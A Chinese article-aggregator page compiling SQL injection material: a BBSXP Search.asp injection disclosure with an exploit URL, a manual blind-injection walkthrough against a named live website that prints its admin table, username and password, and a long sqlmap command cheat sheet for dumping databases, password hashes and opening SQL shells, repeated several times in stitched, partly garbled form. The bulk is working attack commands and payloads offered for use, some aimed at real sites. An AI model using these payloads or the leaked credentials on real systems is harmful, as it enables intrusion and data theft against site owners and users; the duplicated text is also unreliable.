BBSXP,很多注入脚本安全

时间:2023-02-15 07:38:34 其他范文 收藏本文 下载本文

BBSXP,很多注入脚本安全(共9篇)由网友“本拉德皮特”投稿提供,下面是小编收集整理的BBSXP,很多注入脚本安全,供大家参考借鉴,希望可以帮助到有需要的朋友。

BBSXP,很多注入脚本安全

篇1:BBSXP,很多注入脚本安全

By:sobiny[B.C.T]

提交给BBSXP的漏洞公告,官方一点反映都没呢,。

其实主要是他们一个类型的注入太多了。

我都不好意思发出来,发多了手痛。

哎,举例一个。

Search.asp文件

127.0.0.1/Search.asp?menu=Result&ForumID=1&Keywords=aaaaa&Item=ThreadID&DateComparer=365&SortBy=Desc/**/union&VerifyCode=8149

if Request(“menu”)=“Result” then

Keywords=HTMLEncode(Request(“Keywords”))

SortBy=HTMLEncode(Request(“SortBy”))

Item=HTMLEncode(Request(“Item”))

if Keywords=“” then error(“您没有输入任何查询条件!”)

if Request(“VerifyCode”)Session(“VerifyCode”) or Session(“VerifyCode”)=“” then

error(“验证码错误!”)

SQLSearch=“IsApproved=1 and IsDel=0 and ”&Item&“ like '%”&Keywords&“%' ”

if DateComparer >0 then SQLSearch=SQLSearch&“ and

PostTime>”&SqlNowString&“-”&DateComparer&“ ”

if ForumID >0 then SQLSearch=SQLSearch&“ and ForumID=”&ForumID&“ ”

sql=“select * from [BBSXP_Threads] where ”&SQLSearch&“ order by ThreadID

”&SortBy&“”

Rs.Open sql,Conn,1

……………………

我汗死,一个语句中,有两个地方可以注入,BBSXP简直太有才了,

他们不把这类型的漏洞补了

我还真不准备看了,太多了,BUG。

篇2:手工注入脚本安全

现在注入工具横行,自动化的程度已经...不能再自动了.

很多人会熟练的使用啊D,明小子之类的自动注入工具.以为自己就会了...

注入的原理呢.什么是注入.为什么会造成注入.过程...等.

你知道吗?你有没有试过真正的手工注入?没吧.

现在就利用我写的手工注入工具来讲解一下总体手工注入过程.

先找个有注入漏洞的站.很简单满大街都是.

www.jinhu168.com/A3/NewsInfo.asp?id=75

manage_User

username  admin

password  bfpms

id  35

已经找好了.这是一个标准欠黑型网站.安全度就不用说了.

www.jinhu168.com/A3/NewsInfo.asp?id=75

有注入漏洞的地址.检查一下.

基本确定可能有漏洞.继续.

www.jinhu168.com/A3/NewsInfo.asp?id=75 and exists (select * from manage_User)

查询manage_User这个表名是否存在.

不好意思.这工具老出错...录制这个工具不怎么好用.有好用的有空介绍个啊....

好了继续.

manage_User 存在...页面返回正常...

名字改了下`不存在就返回错误的页面`

这里是给你填写提示语句用的`不用的话清空就行了.

继续.

返回正常.说明存在.继续.等等`听电话`

不好意思.

不是1位哦`回显错误.呵呵`5位的`回显正常`

这样我们就知道 他很多东西了`表..项..还有内容长度.

帐号的第一位的第一个字母不是1所以出错.

呵呵`帐号的第一位的第一个字母是a 正确...所以回显正常.

帐号是什么我想都不用怎么想了吧`5位数的admin

确实是的哦....哈哈.

www.jinhu168.com/A3/NewsInfo.asp?id=75 and 1=(select count(*) from [manage_User] where left(username,5)='admin')

为了给大家学习.我把例句都提取出来了.和程序过程是一样的,大家可以研究下.

其他的密码等也是这种过程. 大家明白了吗?要难不是很难`只是要有耐心.如果简单的话就不会出现

全自动的注入工具了.

希望大家在使用我的工具的同时也能学到点东西.

篇3:sqlmap 注入命令脚本安全

工具提供sqlmap0.9版本、、

获取数据库名

./sqlmap.py -u “www.xx.php?nid=14550″

–user-agent “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0;

.NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR

3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)” –dbs

获取表名

./sqlmap.py -u “www.xxx.php?nid=14550″

–user-agent “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0;

.NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR

3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)” -D database

–tables

获取列名

./sqlmap.py -u “www.xxx.php?nid=14550″

–user-agent “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0;

.NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR

3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)” -D database -T

cdb_adminactions –columns

获取值

./sqlmap.py -u “www.xxx.php?nid=14550″

–user-agent “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0;

.NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR

3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)” -D database -T

cdb_members -C username,password –dump

svn checkout svn.sqlmap.org/sqlmap/trunk/sqlmap

sqlmap-dev

sqlmap.py -u “www.islamichina.com/hotelinchina.asp?cityid=2&m=1″

-v 1 –sql-shell //执行SQL语句

sqlmap.py -u “www.islamichina.com/hotelinchina.asp?cityid=2&m=1″

-v 5 //更详细的信息

load options from a configuration INI file

sqlmap -c

sqlmap.conf

使用POST方法提交

sqlmap.py -u “www.myhack58.com/sqlmap/oracle/post_int.php”

–method POST –data “id=1″

使用COOKIES方式提交,cookie的值用;分割,可以使用TamperData来抓cookies

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/cookie_int.php”

–cookie “id=1″ -v 1

使用referer欺骗

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″

–referer “www.google.com” -v 3

使用自定义user-agent,或者使用随机使用自带的user-agents.txt

python sqlmap.py -u “www.myhack58.com/sqlmap/oracle/get_int.php?id=1″

–user-agent “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)” -v

3

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1″

-v 1 -a “./txt/user-agents.txt”

使用基本认证

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/basic/get_int.php?id=1″

–auth-type Basic –auth-cred “testuser:testpass” -v 3

使用Digest认证

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/digest/get_int.php?id=1″

–auth-type Digest –auth-cred “testuser:testpass” -v 3

使用代理,配合TOR

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″

–proxy “192.168.1.47:3128″

python

sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″

–proxy “192.168.1.47:8118″

使用多线程猜解

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1″

-v 1 –current-user –threads 3

绕过动态检测,直接指定有注入点的参数,可以使用,分割多个参数,指定user-agent注入

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″

-v 1 -p “id

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1&cat=2″

-v 1 -p “cat,id”

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/ua_str.php”

-v 1 -p “user-agent” –user-agent “sqlmap/0.7rc1 (sqlmap.sourceforge.net)”

指定数据库,绕过SQLMAP的自动检测

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″

-v 2 –dbms “PostgreSQL”

* MySQL

* oracle

* PostgreSQL

*

Microsoft SQL Server

指定操作系统,绕过SQLMAP自动检测

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″

-v 2 –os “Windows”

* Linux

* Windows

自定义payload

Options:

–prefix and –postfix

In some circumstances the vulnerable parameter is

exploitable only if the user provides a postfix to be appended to the injection

payload. Another scenario where these options come handy presents itself when

the user already knows that query syntax and want to detect and exploit the SQL

injection by directly providing a injection payload prefix and/or

postfix.

Example on a MySQL 5.0.67 target on a page where the SQL query

is: $query = “Select * FROM users Where id=(‘” . $_GET['id'] . “‘) LIMIT 0,

1″;:

$ python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_str_brackets.php?id=1″

-v 3 -p “id” –prefix “‘” –postfix “AND

‘test’='test”

[...]

[hh:mm:16] [INFO] testing sql injection on GET

parameter ‘id’ with 0 parenthesis

[hh:mm:16] [INFO] testing custom injection

on GET parameter ‘id’

[hh:mm:16] [TRAFFIC OUT] HTTP request:

GET

/sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20

%28%27test%27=%27test

HTTP/1.1

Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7

Host:

www.myhack58.com:80

Accept-language: en-us,en;q=0.5

Accept:

text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,

image/png,*/*;q=0.5

User-agent:

sqlmap/0.7rc1 (sqlmap.sourceforge.net)

Connection:

close

[...]

[hh:mm:17] [INFO] GET parameter ‘id’ is custom

injectable

[...]

As you can see, the injection payload for testing for

custom injection

is:

id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test

which

URL decoded is:

id=1′) AND 7433=7433 AND (‘test’='test

and makes

the query syntatically correct to the page query:

Select * FROM users

Where id=(’1′) AND 7433=7433 AND (‘test’='test’) LIMIT 0, 1

In this

simple example, sqlmap could detect the SQL injection and exploit it without

need to provide a custom injection payload, but sometimes in the real world

application it is necessary to provide it.

页面比较

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1″

–string “luther” -v 1

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1″

–regexp “ lu[w][w]er” -v

排除网站的内容

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1″

–excl-reg “Dynamic content: ([d]+)”

多语句测试,php内嵌函数mysql_query,不支持多语句

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1″

–stacked-test -v 1

union注入测试

python sqlmap.py -u “www.myhack58.com/sqlmap/oracle/get_int.php?id=1″

–union-test -v 1

unionz注入配合orderby

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_str.php?id=1″

–union-test –union-tech orderby -v 1

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1″

-v 1 –union-use –banner

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1″

-v 5 –union-use –current-user

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int_partialunion.php?id=1″

-v 1 –union-use –dbs

fingerprint

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1″

-v 1 -f

python sqlmap.py -u “192.168.123.36/sqlmap/get_str.asp?name=luther”

-v 1 -f -b

判断当前用户是否是dba

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″

–is-dba -v 1

列举数据库用户

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″

–users -v 0

列举数据库用户密码

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1″

–passwords -v 0

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1″

–passwords -U sa -v 0

查看用户权限

python sqlmap.py -u “www.myhack58.com/sqlmap/oracle/get_int.php?id=1″

–privileges -v 0

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″

–privileges -U postgres -v 0

列数据库

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1″

–dbs -v 0

列出指定数据库指定表的列名

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1″

–columns -T users -D test -v 1

列出指定数据库的指定表的指定列的内容

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1″

–dump -T users -D master -C surname -v 0

指定列的范围从2-4

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1″

–dump -T users -D test –start 2 –stop 4 -v 0

导出所有数据库,所有表的内容

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1″

–dump-all -v 0

只列出用户自己新建的数据库和表的内容

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1″

–dump-all –exclude-sysdbs -v 0

sql query

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″

–sql-query “Select usename FROM pg_user” -v 0

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1″

–sql-query “Select host, password FROM mysql.user LIMIT 1, 3″ -v

1

Select usename, passwd FROM pg_shadow orDER BY usename

保存和恢复会话

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″

-b -v 1 -s “sqlmap.log”

保存选项到INC配置文件

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″

-b -v 1 –save

获取数据库名:

./sqlmap.py -u “www.xx.php?nid=14550” --user-agent “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)” --dbs

获取表名:

./sqlmap.py -u “www.xxx.php?nid=14550” --user-agent “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)” -D database --tables

获取列名

./sqlmap.py -u “www.xxx.php?nid=14550” --user-agent “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)” -D database -T cdb_adminactions --columns

获取值

./sqlmap.py -u “www.xxx.php?nid=14550” --user-agent “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)” -D database -T cdb_members -C username,password --dump

更新

svn checkout svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

sqlmap.py -u “www.islamichina.com/hotelinchina.asp?cityid=2&m=1” -v 1 --sql-shell //执行SQL语句

sqlmap.py -u “www.islamichina.com/hotelinchina.asp?cityid=2&m=1” -v 5 //更详细的信息

load options from a configuration INI file

sqlmap -c sqlmap.conf

使用POST方法提交

sqlmap.py -u “www.myhack58.com/sqlmap/oracle/post_int.php” --method POST --data “id=1”

使用COOKIES方式提交,cookie的值用;分割,可以使用TamperData来抓cookies

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/cookie_int.php” --cookie “id=1” -v 1

使用referer欺骗

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” --referer “www.google.com” -v 3

使用自定义user-agent,或者使用随机使用自带的user-agents.txt

python sqlmap.py -u “www.myhack58.com/sqlmap/oracle/get_int.php?id=1” --user-agent “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)” -v 3

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1” -v 1 -a “./txt/user-agents.txt”

使用基本认证

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/basic/get_int.php?id=1” --auth-type Basic --auth-cred “testuser:testpass” -v 3

使用Digest认证

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/digest/get_int.php?id=1” --auth-type Digest --auth-cred “testuser:testpass” -v 3

使用代理,配合TOR

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” --proxy “192.168.1.47:3128”

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” --proxy “192.168.1.47:8118”

使用多线程猜解

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1” -v 1 --current-user --threads 3

绕过动态检测,直接指定有注入点的参数,可以使用,分割多个参数,指定user-agent注入

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” -v 1 -p “id

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1&cat=2“ -v 1 -p ”cat,id“

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/ua_str.php“ -v 1 -p ”user-agent“ --user-agent ”sqlmap/0.7rc1 (sqlmap.sourceforge.net)“

指定数据库,绕过SQLMAP的自动检测

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ -v 2 --dbms ”PostgreSQL“

* MySQL

* oracle

* PostgreSQL

* Microsoft SQL Server

指定操作系统,绕过SQLMAP自动检测

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ -v 2 --os ”Windows“

* Linux

* Windows

自定义payload

Options: --prefix and --postfix

In some circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the SQL injection by directly providing a injection payload prefix and/or postfix.

Example on a MySQL 5.0.67 target on a page where the SQL query is: $query = ”Select * FROM users Where id=('“ . $_GET['id'] . ”') LIMIT 0, 1“;:

$ python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_str_brackets.php?id=1“ -v 3 -p ”id“ --prefix ”'“ --postfix ”AND 'test'='test“

[...]

[hh:mm:16] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis

[hh:mm:16] [INFO] testing custom injection on GET parameter 'id'

[hh:mm:16] [TRAFFIC OUT] HTTP request:

GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20

%28%27test%27=%27test HTTP/1.1

Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7

Host: www.myhack58.com:80

Accept-language: en-us,en;q=0.5

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,

image/png,*/*;q=0.5

User-agent: sqlmap/0.7rc1 (sqlmap.sourceforge.net)

Connection: close

[...]

[hh:mm:17] [INFO] GET parameter 'id' is custom injectable

[...]

As you can see, the injection payload for testing for custom injection is:

id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test

which URL decoded is:

id=1') AND 7433=7433 AND ('test'='test

and makes the query syntatically correct to the page query:

Select * FROM users Where id=('1') AND 7433=7433 AND ('test'='test') LIMIT 0, 1

In this simple example, sqlmap could detect the SQL injection and exploit it without need to provide a custom injection payload, but sometimes in the real world application it is necessary to provide it.

页面比较

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1“ --string ”luther“ -v 1

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1“ --regexp ”lu[w][w]er“ -v

排除网站的内容

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1“ --excl-reg ”Dynamic content: ([d]+)“

多语句测试,php内嵌函数mysql_query(),不支持多语句

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ --stacked-test -v 1

union注入测试

python sqlmap.py -u ”www.myhack58.com/sqlmap/oracle/get_int.php?id=1“ --union-test -v 1

unionz注入配合orderby

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_str.php?id=1“ --union-test --union-tech orderby -v 1

python sqlmap.py -u ”www.myhack58.com/sqlmap/mssql/get_int.php?id=1“ -v 1 --union-use --banner

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ -v 5 --union-use --current-user

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int_partialunion.php?id=1“ -v 1 --union-use --dbs

fingerprint

python sqlmap.py -u ”www.myhack58.com/sqlmap/mssql/get_int.php?id=1“ -v 1 -f

python sqlmap.py -u ”192.168.123.36/sqlmap/get_str.asp?name=luther“ -v 1 -f -b

判断当前用户是否是dba

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ --is-dba -v 1

列举数据库用户

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ --users -v 0

列举数据库用户密码

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ --passwords -v 0

python sqlmap.py -u ”www.myhack58.com/sqlmap/mssql/get_int.php?id=1“ --passwords -U sa -v 0

查看用户权限

python sqlmap.py -u ”www.myhack58.com/sqlmap/oracle/get_int.php?id=1“ --privileges -v 0

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ --privileges -U postgres -v 0

列数据库

python sqlmap.py -u ”www.myhack58.com/sqlmap/mssql/get_int.php?id=1“ --dbs -v 0

列出指定数据库指定表的列名

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ --columns -T users -D test -v 1

列出指定数据库的指定表的指定列的内容

python sqlmap.py -u ”www.myhack58.com/sqlmap/mssql/get_int.php?id=1“ --dump -T users -D master -C surname -v 0

指定列的范围从2-4

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ --dump -T users -D test --start 2 --stop 4 -v 0

导出所有数据库,所有表的内容

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ --dump-all -v 0

只列出用户自己新建的数据库和表的内容

python sqlmap.py -u ”www.myhack58.com/sqlmap/mssql/get_int.php?id=1“ --dump-all --exclude-sysdbs -v 0

sql query

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ --sql-query ”Select usename FROM pg_user“ -v 0

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ --sql-query ”Select host, password FROM mysql.user LIMIT 1, 3“ -v 1

Select usename, passwd FROM pg_shadow orDER BY usename

保存和恢复会话

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ -b -v 1 -s ”sqlmap.log“

保存选项到INC配置文件

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ -b -v 1 --save

获取数据库名

./sqlmap.py -u ”www.xx.php?nid=14550“ --user-agent ”Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)“ --dbs获取表名

./sqlmap.py -u ”www.xxx.php?nid=14550“ --user-agent ”Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)“ -D database --tables

获取列名

./sqlmap.py -u ”www.xxx.php?nid=14550“ --user-agent ”Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)“ -D database -T cdb_adminactions --columns

获取值

./sqlmap.py -u ”www.xxx.php?nid=14550“ --user-agent ”Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)“ -D database -T cdb_members -C username,password --dump

来源:影子

更新

svn checkout svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-devsqlmap.py -u ”www.islamichina.com/hotelinchina.asp?cityid=2&m=1“ -v 1 --sql-shell //执行SQL语句

sqlmap.py -u ”www.islamichina.com/hotelinchina.asp?cityid=2&m=1“ -v 5 //更详细的信息

load options from a configuration INI file

sqlmap -c sqlmap.conf使用POST方法提交

sqlmap.py -u ”www.myhack58.com/sqlmap/oracle/post_int.php“ --method POST --data ”id=1“使用COOKIES方式提交,cookie的值用;分割,可以使用TamperData来抓cookies

python sqlmap.py -u ”www.myhack58.com/sqlmap/mssql/cookie_int.php“ --cookie ”id=1“ -v 1使用referer欺骗

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ --referer ”www.google.com“ -v 3使用自定义user-agent,或者使用随机使用自带的user-agents.txt

python sqlmap.py -u ”www.myhack58.com/sqlmap/oracle/get_int.php?id=1“ --user-agent ”Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)“ -v 3python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ -v 1 -a ”./txt/user-agents.txt“

使用基本认证

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/basic/get_int.php?id=1“ --auth-type Basic --auth-cred ”testuser:testpass“ -v 3使用Digest认证

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/digest/get_int.php?id=1“ --auth-type Digest --auth-cred ”testuser:testpass“ -v 3使用代理,配合TOR

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ --proxy ”192.168.1.47:3128“

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ --proxy ”192.168.1.47:8118“使用多线程猜解

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ -v 1 --current-user --threads 3绕过动态检测,直接指定有注入点的参数,可以使用,分割多个参数,指定user-agent注入

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ -v 1 -p ”id

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1&cat=2” -v 1 -p “cat,id”

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/ua_str.php” -v 1 -p “user-agent” --user-agent “sqlmap/0.7rc1 (sqlmap.sourceforge.net)”指定数据库,绕过SQLMAP的自动检测

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” -v 2 --dbms “PostgreSQL”* MySQL

* oracle

* PostgreSQL

* Microsoft SQL Server指定操作系统,绕过SQLMAP自动检测

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” -v 2 --os “Windows”* Linux

* Windows自定义payload

Options: --prefix and --postfixIn some circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the SQL injection by directly providing a injection payload prefix and/or postfix.

Example on a MySQL 5.0.67 target on a page where the SQL query is: $query = “Select * FROM users Where id=('” . $_GET['id'] . “') LIMIT 0, 1”;:

$ python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_str_brackets.php?id=1” -v 3 -p “id” --prefix “'” --postfix “AND 'test'='test”

[...]

[hh:mm:16] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis

[hh:mm:16] [INFO] testing custom injection on GET parameter 'id'

[hh:mm:16] [TRAFFIC OUT] HTTP request:

GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20

%28%27test%27=%27test HTTP/1.1

Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7

Host: www.myhack58.com:80

Accept-language: en-us,en;q=0.5

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,

image/png,*/*;q=0.5

User-agent: sqlmap/0.7rc1 (sqlmap.sourceforge.net)

Connection: close

[...]

[hh:mm:17] [INFO] GET parameter 'id' is custom injectable

[...]As you can see, the injection payload for testing for custom injection is:

id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test

which URL decoded is:

id=1') AND 7433=7433 AND ('test'='test

and makes the query syntatically correct to the page query:

Select * FROM users Where id=('1') AND 7433=7433 AND ('test'='test') LIMIT 0, 1

In this simple example, sqlmap could detect the SQL injection and exploit it without need to provide a custom injection payload, but sometimes in the real world application it is necessary to provide it.

页面比较

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1” --string “luther” -v 1

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1” --regexp “lu[w][w]er” -v排除网站的内容

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1” --excl-reg “Dynamic content: ([d]+)”多语句测试,php内嵌函数mysql_query(),不支持多语句

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1” --stacked-test -v 1union注入测试

python sqlmap.py -u “www.myhack58.com/sqlmap/oracle/get_int.php?id=1” --union-test -v 1unionz注入配合orderby

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_str.php?id=1” --union-test --union-tech orderby -v 1python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1” -v 1 --union-use --banner

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1” -v 5 --union-use --current-user

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int_partialunion.php?id=1” -v 1 --union-use --dbsfingerprint

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1” -v 1 -f

python sqlmap.py -u “192.168.123.36/sqlmap/get_str.asp?name=luther” -v 1 -f -b判断当前用户是否是dba

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” --is-dba -v 1列举数据库用户

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” --users -v 0

列举数据库用户密码

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1” --passwords -v 0

